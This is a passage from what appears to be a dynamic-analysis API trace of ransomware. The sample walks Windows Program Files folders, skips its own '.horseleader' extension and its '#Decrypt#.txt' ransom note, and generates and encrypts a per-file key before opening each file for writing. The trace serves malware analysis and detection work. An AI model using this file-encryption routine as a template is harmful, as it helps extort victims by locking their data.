Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.406] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, 
ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="4to3Squareframe_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.406] lstrcmpiW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.406] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 87 [0251.406] StrStrIW (lpFirst="4to3Squareframe_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.406] lstrcmpW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.406] lstrcmpW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.406] lstrlenW (lpString=".testttjffg") returned 11 [0251.407] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.407] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.407] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.407] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec8a80b, 
ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec8a80b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd8b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="4to3Squareframe_VideoInset.png", cAlternateFileName="")) returned 1 [0251.407] lstrcmpiW (lpString1="4to3Squareframe_VideoInset.png", lpString2="Windows") returned -1 [0251.407] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 78 [0251.407] StrStrIW (lpFirst="4to3Squareframe_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.407] lstrcmpW (lpString1="4to3Squareframe_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.407] lstrcmpW (lpString1="4to3Squareframe_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0251.407] lstrlenW (lpString=".testttjffg") returned 11 [0251.407] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.407] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.407] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.408] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.408] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BabyBoy", cAlternateFileName="")) returned 1 [0251.408] lstrcmpiW (lpString1="BabyBoy", lpString2="Windows") returned -1 [0251.408] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 55 [0251.408] lstrcmpW (lpString1="BabyBoy", lpString2=".") returned 1 [0251.408] lstrcmpW (lpString1="BabyBoy", lpString2="..") returned 1 [0251.408] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.408] GetProcessHeap () returned 0x780000 [0251.408] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.408] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*") returned 57 [0251.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.411] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.411] wnsprintfW (in: pszDest=0x7dc820, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\.") returned 57 [0251.411] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.411] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.412] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.412] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\..") returned 58 [0251.412] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.412] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.412] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cace83, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70cace83, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x303d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="babyblue.png", cAlternateFileName="")) returned 1 [0251.412] lstrcmpiW (lpString1="babyblue.png", lpString2="Windows") returned -1 [0251.412] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 68 [0251.412] StrStrIW (lpFirst="babyblue.png", lpSrch=".horseleader") returned 0x0 [0251.412] lstrcmpW (lpString1="babyblue.png", 
lpString2="#Decrypt#.txt") returned 1 [0251.412] lstrcmpW (lpString1="babyblue.png", lpString2="_uninstalling_.png") returned 1 [0251.412] lstrlenW (lpString=".testttjffg") returned 11 [0251.412] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png", lpSrch=".testttjffg") returned 0x0 [0251.412] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.412] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.412] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.413] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d1f29a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70d1f29a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cec0f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5354a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainBackground.wmv", cAlternateFileName="")) returned 1 [0251.413] lstrcmpiW (lpString1="BabyBoyMainBackground.wmv", lpString2="Windows") returned -1 [0251.413] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 81 [0251.413] StrStrIW (lpFirst="BabyBoyMainBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.413] lstrcmpW 
(lpString1="BabyBoyMainBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.413] lstrcmpW (lpString1="BabyBoyMainBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.413] lstrlenW (lpString=".testttjffg") returned 11 [0251.413] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.413] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.413] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.414] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d6b554, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70d6b554, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cec0f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4f6ca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.414] lstrcmpiW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.414] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 85 [0251.414] StrStrIW 
(lpFirst="BabyBoyMainBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.414] lstrcmpW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.414] lstrcmpW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.414] lstrlenW (lpString=".testttjffg") returned 11 [0251.414] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.415] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.415] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.415] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e03ac8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e03ac8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49d12255, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2279e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainToNotesBackground.wmv", cAlternateFileName="")) returned 1 [0251.415] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="Windows") returned -1 [0251.415] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 88 [0251.415] StrStrIW (lpFirst="BabyBoyMainToNotesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.415] lstrcmpW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.415] lstrcmpW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.415] lstrlenW (lpString=".testttjffg") returned 11 [0251.415] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.415] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.415] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.415] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.415] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e29c25, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e29c25, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49eb515f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2661e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainToNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.415] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="Windows") 
returned -1 [0251.416] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 92 [0251.416] StrStrIW (lpFirst="BabyBoyMainToNotesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.416] lstrcmpW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.416] lstrcmpW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.416] lstrlenW (lpString=".testttjffg") returned 11 [0251.416] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.416] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.416] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.416] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e4fd82, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e4fd82, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49eb515f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c9de, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, 
cFileName="BabyBoyMainToScenesBackground.wmv", cAlternateFileName="")) returned 1 [0251.416] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="Windows") returned -1 [0251.416] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 89 [0251.416] StrStrIW (lpFirst="BabyBoyMainToScenesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.416] lstrcmpW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.416] lstrcmpW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.416] lstrlenW (lpString=".testttjffg") returned 11 [0251.416] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.416] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.416] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.418] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e4fd82, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e4fd82, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49eb515f, 
ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2279e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainToScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.418] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.418] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv") returned 93 [0251.418] StrStrIW (lpFirst="BabyBoyMainToScenesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.418] lstrcmpW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.418] lstrcmpW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.418] lstrlenW (lpString=".testttjffg") returned 11 [0251.418] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.418] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.418] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.418] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.418] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ec2199, 
ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ec2199, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49edb2bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2666c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyNotesBackground.wmv", cAlternateFileName="")) returned 1 [0251.418] lstrcmpiW (lpString1="BabyBoyNotesBackground.wmv", lpString2="Windows") returned -1 [0251.418] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv") returned 82 [0251.418] StrStrIW (lpFirst="BabyBoyNotesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.418] lstrcmpW (lpString1="BabyBoyNotesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.418] lstrcmpW (lpString1="BabyBoyNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.418] lstrlenW (lpString=".testttjffg") returned 11 [0251.418] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.419] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.419] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.419] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
